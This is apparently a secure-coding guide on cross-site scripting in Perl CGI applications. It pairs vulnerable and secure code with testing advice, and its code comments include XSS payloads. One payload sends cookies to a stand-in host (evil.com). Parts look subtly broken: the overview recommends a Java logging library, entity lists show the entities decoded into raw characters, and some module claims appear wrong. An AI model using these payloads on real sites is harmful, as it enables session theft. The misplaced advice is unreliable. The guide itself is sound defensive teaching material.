CWE-80: Cross-Site Scripting (XSS) - Perl

Overview

Cross-Site Scripting (CWE-80) occurs when untrusted data is included in web pages without proper encoding. Attackers inject malicious scripts that execute in victim browsers, stealing sessions, credentials, or performing actions on behalf of users. Perl applications must encode all user-controlled output using context-appropriate functions.

Primary Defence: Use CGI.pm's escapeHTML() for HTML contexts and escape() for URL parameters. For new projects, configure JSON logging with logstash-logback-encoder or use Template::Toolkit with HTML entity filters. Always apply context-appropriate encoding (HTML, JavaScript, or URL) based on where user data appears in output.

Common Vulnerable Patterns

Direct User Input in HTML

use CGI qw(:standard);

# VULNERABLE - No encoding
my $name = param('name');
print "<h1>Hello, $name!</h1>";

# Attack: ?name=<script>alert(document.cookie)</script>
# Result: XSS executes, steals session cookie

Why this is vulnerable: Directly interpolating CGI parameters into HTML without encoding allows attackers to inject arbitrary HTML and JavaScript. The param('name') function returns raw user input, and when printed directly into an HTML tag, special characters like <, >, and " are interpreted as HTML markup rather than text. An attacker can inject <script> tags to execute JavaScript, steal cookies via document.cookie, redirect users, or perform actions on their behalf. The lack of encoding makes this a classic reflected XSS vulnerability.

Unescaped User Input in HTML Attributes

# VULNERABLE - User input in style attribute
my $color = param('color');
print qq{<div style="color: $color">Text</div>};

# Attack: ?color=red;background:url(javascript:alert(1))
# Result: JavaScript execution via CSS injection

Why this is vulnerable: HTML attributes are parsing contexts where special characters have syntactic meaning. Injecting user input into a style attribute allows attackers to break out of the expected color value and inject malicious CSS properties. CSS injection can execute JavaScript through expression() in older browsers, url(javascript:...) protocols, or import external stylesheets. Even without quotes around the attribute value, attackers can inject spaces or semicolons to add new attributes like onload="alert(1)" or manipulate the existing attribute's behavior. All user input in attributes must be both HTML-encoded and quoted.

User Input in JavaScript Context

# VULNERABLE - Direct interpolation in script
my $msg = param('message');
print qq{<script>alert('$msg');</script>};

# Attack: ?message='; document.location='http://evil.com/steal?cookie='+document.cookie; //
# Result: Cookie theft via redirect

Why this is vulnerable: Embedding user input directly into JavaScript code allows attackers to break out of the string context using quotes and inject arbitrary JavaScript commands. The single quote in the attack closes the alert string, the semicolon terminates that statement, and the attacker's malicious code executes. HTML encoding is insufficient here - < and > don't prevent quote-based injection. JavaScript contexts require JavaScript-specific encoding (escaping quotes, backslashes, newlines) or better yet, using JSON encoding. Attackers can steal cookies, redirect to phishing sites, modify page content, or perform actions as the authenticated user.

Template Interpolation Without Escaping

# VULNERABLE - Direct interpolation in heredoc
my $comment = param('comment');
print <<HTML;
<div class="comment">
    $comment
</div>
HTML

# Attack: comment=<img src=x onerror=alert(document.cookie)>
# Result: XSS via image error handler

Why this is vulnerable: Perl's heredoc syntax (<<HTML) performs variable interpolation, directly inserting the value of $comment into the HTML output without any encoding. This is equivalent to string concatenation and provides no XSS protection. The <img> tag with an onerror handler is a common XSS vector - the invalid src triggers the error handler which executes JavaScript. Heredocs and quoted strings with interpolation are convenient but dangerous when they contain user input. Always use escapeHTML() or encode_entities() before interpolating user data into templates.

Building HTML with String Concatenation

# VULNERABLE - Manual HTML construction
my $html = "<p>" . $user_input . "</p>";
print $html;

# Attack: user_input=</p><script>alert(1)</script><p>
# Result: Closes paragraph, injects script, reopens paragraph

Why this is vulnerable: String concatenation to build HTML treats user input as trusted HTML markup, allowing attackers to inject arbitrary tags. The </p> closes the intended paragraph, the <script> tag injects malicious code, and the final <p> masks the attack by maintaining valid HTML structure. This pattern is particularly dangerous because it bypasses any output encoding - the string is constructed with literal angle brackets that browsers interpret as HTML. Always use encoding functions or template systems with auto-escaping rather than manual HTML construction with concatenation.

Secure Patterns

Using CGI Autoescape Functions

use CGI qw(:standard);

# SECURE - Auto-escaped by CGI.pm
print start_html('Form'),
      h1('Enter Information'),
      start_form,
      'Name: ', textfield('name'),      # Auto-escaped
      br,
      'Comment: ', textarea('comment'), # Auto-escaped
      br,
      submit,
      end_form,
      end_html;

Why this works: CGI.pm version 1.57 and later automatically HTML-encodes values in form generation functions like textfield(), textarea(), popup_menu(), and others. When you use these functions, CGI.pm applies escapeHTML() internally to all user-provided values before rendering them into HTML. This prevents XSS by converting special characters (<, >, &, ", ') into HTML entities. The auto-escaping is transparent - you simply call the form functions and CGI.pm handles the security. This approach is safer than manual HTML construction because you can't accidentally forget to encode a value. However, verify your CGI.pm version (print $CGI::VERSION) to ensure you have 1.57 or later, as older versions don't auto-escape. The auto-escaping only applies to CGI.pm's HTML generation functions, not to direct print statements, so you still need manual encoding for custom HTML output.

Manual Encoding with CGI

use CGI qw(:standard);

# SECURE - Explicit escaping
my $username = param('username');
my $safe_username = escapeHTML($username);
print "<div class='user'>$safe_username</div>";

# SECURE - URL encoding
my $search_term = param('q');
my $safe_url = escape($search_term);
print qq{<a href="/search?q=$safe_url">Search</a>};

Why this works: CGI.pm's escapeHTML() function converts special HTML characters (<, >, &, ", ') into their HTML entity equivalents, preventing browsers from interpreting user input as executable code. This is the standard Perl approach for HTML encoding, analogous to htmlspecialchars() in PHP or HtmlEncoder in C#. The escape() function provides URL encoding for query parameters, percent-encoding special characters so they're treated as data rather than URL syntax. Using these CGI.pm functions ensures consistent, tested encoding across your Perl web application.

Using HTML::Entities

use HTML::Entities qw(encode_entities);

# SECURE - Encode all entities
my $user_content = param('content');
my $safe_content = encode_entities($user_content);
print "<article>$safe_content</article>";

# SECURE - Selective encoding
my $text = param('text');
my $safe_text = encode_entities($text, '<>&"\'');
print qq{<span title="$safe_text">Text</span>};

Why this works: HTML::Entities::encode_entities() provides more comprehensive HTML encoding than CGI's escapeHTML(), handling a wider range of characters including accented characters and symbols. It converts characters to numeric or named HTML entities, ensuring they display correctly while being safe from XSS. The function can encode all non-ASCII characters or just specific dangerous characters (like <>&"'). This is particularly useful when you need fine-grained control over encoding or are working with international character sets. The library is well-maintained and widely used in the Perl ecosystem.

Context-Aware Encoding

use CGI qw(escapeHTML escape);
use JSON::XS;

my $data = param('data');

# SECURE - HTML context
print "<p>" . escapeHTML($data) . "</p>";

# SECURE - URL context
print qq{<a href="/page?id=} . escape($data) . qq{">Link</a>};

# SECURE - JavaScript context
my $json_data = JSON::XS->new->encode({value => $data});
print qq{<script>var config = $json_data;</script>};

Why this works: Different output contexts require different encoding. escapeHTML() handles HTML special characters, escape() percent-encodes for URLs, and JSON::XS->encode() properly escapes for JavaScript. Using HTML encoding in JavaScript contexts would be insufficient - an attacker could inject </script> which closes the script tag even when HTML-encoded. JSON encoding handles quotes, backslashes, and control characters correctly for JavaScript. The JSON::XS module is fast and follows JSON standards, ensuring values are safely embedded in JavaScript code. This context-aware approach prevents bypasses that occur when using the wrong encoder for a given context.

CGI Module Functions (Highest Priority)

use CGI qw(:standard);

# Enable autoescape mode (default since CGI.pm 1.57+)
use CGI qw(-no_xhtml);

# Manual HTML escaping
my $safe_html = escapeHTML($user_input);
print "<div>$safe_html</div>";

# URL parameter escaping
my $safe_url = escape($user_param);
print "<a href='/page?q=$safe_url'>Link</a>";

Why this works: CGI.pm's escapeHTML() is the standard Perl function for HTML encoding, converting dangerous characters (<, >, &, ", ') into their HTML entity equivalents (<, >, &, ", '). This prevents browsers from interpreting user input as executable code. The escape() function provides URL encoding (percent-encoding), converting special characters into %XX format so they're treated as data rather than URL syntax. Using CGI.pm functions ensures consistent, tested encoding across your application. The module is part of Perl's core (though deprecated in modern Perl, it's still widely deployed), making it available without additional dependencies. For new projects, consider modern frameworks like Mojolicious or Dancer2 that have built-in XSS protection, but for legacy CGI applications, escapeHTML() and escape() remain the correct choice.

Auto-escaping CGI Functions (when autoescape mode is enabled):

textfield() - Text input fields
textarea() - Text areas
password_field() - Password fields
filefield() - File upload fields
popup_menu() - Dropdown menus
optgroup() - Option groups
scrolling_list() - Scrolling lists
checkbox_group() - Checkbox groups
checkbox() - Individual checkboxes
radio_group() - Radio button groups
submit() - Submit buttons
defaults() - Default values
hidden() - Hidden fields

HTML::Entities Module

use HTML::Entities;

# Encode HTML entities
my $safe_output = encode_entities($user_input);
print "<p>$safe_output</p>";

# Encode specific characters only
my $partial = encode_entities($text, '<>&"');

# Decode when needed
my $decoded = decode_entities($encoded);

Why this works: The HTML::Entities module provides robust HTML entity encoding through encode_entities(), which converts dangerous characters (<, >, &, ", ') into their HTML entity equivalents (<, >, &, ", '). By default, it encodes all non-ASCII characters and control characters, providing comprehensive protection against XSS attacks. You can specify which characters to encode as a second parameter - encode_entities($text, '<>&"') encodes only the minimum set needed for HTML safety. This is more flexible than CGI.pm's escapeHTML() and is recommended for modern Perl applications. The module handles Unicode correctly and is widely tested. Use encode_entities() for HTML body content and attribute values, but remember different contexts (JavaScript, URLs) require different encoding functions.

Context-Specific Encoding

HTML Content Context

use HTML::Entities qw(encode_entities);

# Encode for HTML body
my $safe = encode_entities($user_data);
print "<div>$safe</div>";

HTML Attribute Context

use CGI qw(escapeHTML);

# Encode for attributes (always use quotes)
my $safe_attr = escapeHTML($user_value);
print qq{<input type="text" value="$safe_attr">};

JavaScript Context

use JSON::XS;

# Use JSON encoding for JavaScript
my $json = JSON::XS->new->encode($data);
print qq{<script>var data = $json;</script>};

# Or escape manually
sub escape_js {
    my $str = shift;
    $str =~ s/\\/\\\\/g;
    $str =~ s/'/\\'/g;
    $str =~ s/"/\\"/g;
    $str =~ s/\n/\\n/g;
    $str =~ s/\r/\\r/g;
    return $str;
}

URL Context

use CGI qw(escape);

# URL-encode parameters
my $safe_param = escape($user_input);
print "<a href='/search?q=$safe_param'>Search</a>";

# Or use URI::Escape
use URI::Escape qw(uri_escape);
my $encoded = uri_escape($param);

Why this works: URL parameters require percent-encoding (also called URL encoding) which converts special characters into %XX hexadecimal format. CGI.pm's escape() function and URI::Escape's uri_escape() both perform this encoding, converting characters like spaces to %20, ampersands to %26, and equals signs to %3D. This prevents attackers from injecting additional query parameters (like &admin=true) or breaking the URL structure. URL encoding is different from HTML encoding - spaces become %20 rather than  , and different characters are considered special. After URL-encoding parameters, you should still HTML-encode the entire URL when embedding in HTML (href attributes), providing defense-in-depth. Always validate URL schemes (allow only http:// and https://) to prevent javascript: URL attacks, as encoding alone doesn't prevent these.

Using Template::Toolkit with Auto-escaping

use Template;

my $tt = Template->new({
    FILTERS => {
        html_entity => \&HTML::Entities::encode_entities,
    },
});

# SECURE - Template with encoding

$tt->process(\*DATA, {
    user_input => param('input'),
});

__DATA__
<div>[% user_input | html_entity %]</div>

Why this works: Template::Toolkit (TT2) is a powerful templating system but doesn't auto-escape by default - you must explicitly apply filters. By defining a custom html_entity filter that wraps HTML::Entities::encode_entities(), you can safely encode user input in templates using the pipe syntax ([% variable | html_entity %]). This separates presentation logic (templates) from encoding logic while ensuring all output is properly escaped. The filter approach makes it easy to spot unencoded variables during code review - any [% variable %] without a filter is potentially vulnerable. Template::Toolkit also provides a built-in html filter, but it uses simpler encoding than HTML::Entities. Register your encoding filter globally in the Template configuration so it's available to all templates. For defense-in-depth, consider using template linting tools to detect variables without encoding filters.

Verification and Detection

Security testing requires multiple approaches - unit tests alone are insufficient.

Static Application Security Testing (SAST)

Use automated tools to detect XSS in Perl code:

Commercial Tools: - Checkmarx - Perl web application security analysis - Fortify - Data flow tracking for Perl/CGI - Veracode - Perl security scanning

Open Source Tools: - Perl::Critic with security policies

# Install Perl::Critic and security-focused policies
cpan Perl::Critic
cpan Perl::Critic::Policy::ValuesAndExpressions::PreventSQLInjection

# Run security checks
perlcritic --severity 1 --verbose 8 your_script.pl

Semgrep - Pattern-based security scanning
```
semgrep --config=p/perl .
```

Dynamic Application Security Testing (DAST)

Test running Perl applications:

OWASP ZAP - Automated web vulnerability scanner
Burp Suite Professional - Comprehensive security testing
Nikto - Web server vulnerability scanner
w3af - Web application attack and audit framework

Code Review Checklist

Manually verify:

All print statements use escapeHTML() or encode_entities()
No direct interpolation of param() values into HTML
Template::Toolkit uses [% FILTER html %] or [% var | html %]
CGI.pm autoescape mode enabled
No use of Markup or mark_safe equivalents on user input
Context-appropriate encoding (HTML vs JavaScript vs URL)
All input sources identified (params, cookies, headers)

Framework-Specific Tools

CGI.pm:

# Check for unsafe patterns
grep -r "param(" *.pl | grep -v "escapeHTML\|encode_entities"

Template::Toolkit:

# Find unfiltered variables
grep -r "\[%" templates/ | grep -v "FILTER\|html\|html_entity"

Limited Role of Manual Tests

Manual tests can verify encoding works but not comprehensive security:

use Test::More;
use HTML::Entities;

# Tests verify encoding - NOT comprehensive security
sub test_encoding {
    my $malicious = '<script>alert(1)</script>';
    my $encoded = encode_entities($malicious);

    unlike($encoded, qr/<script>/, 'Script tags encoded');
    like($encoded, qr/&lt;script&gt;/, 'Contains encoded tags');
}

Important: Passing these tests does NOT mean your application is secure. Use SAST/DAST tools to find actual vulnerabilities.

Integration Testing

use Test::WWW::Mechanize;

sub test_xss_protection {
    my $mech = Test::WWW::Mechanize->new;
    my $xss_payload = '<script>alert(1)</script>';

    $mech->get("/profile?bio=$xss_payload");

    # Verify encoding
    unlike($mech->content, qr/<script>/, 'XSS payload encoded');
    like($mech->content, qr/&lt;script&gt;/, 'Contains HTML entities');
}

Security Headers Testing

# Check CSP and security headers
curl -I http://localhost/app.cgi | grep -i "content-security-policy\|x-frame-options"

Continuous Security

CI/CD Integration - Run Perl::Critic in build pipeline
Pre-commit Hooks - Scan code before commits
Dependency Scanning - Check CPAN modules for vulnerabilities
Code Review - Manual security review for critical changes
Penetration Testing - Regular professional security assessments

Content Security Policy Headers

use CGI;

my $q = CGI->new;
print $q->header(
    -type => 'text/html',
    -charset => 'utf-8',
    -Content_Security_Policy => "default-src 'self'; " .
                                "script-src 'self' 'nonce-random123'; " .
                                "style-src 'self' 'unsafe-inline'; " .
                                "img-src 'self' https:;"
);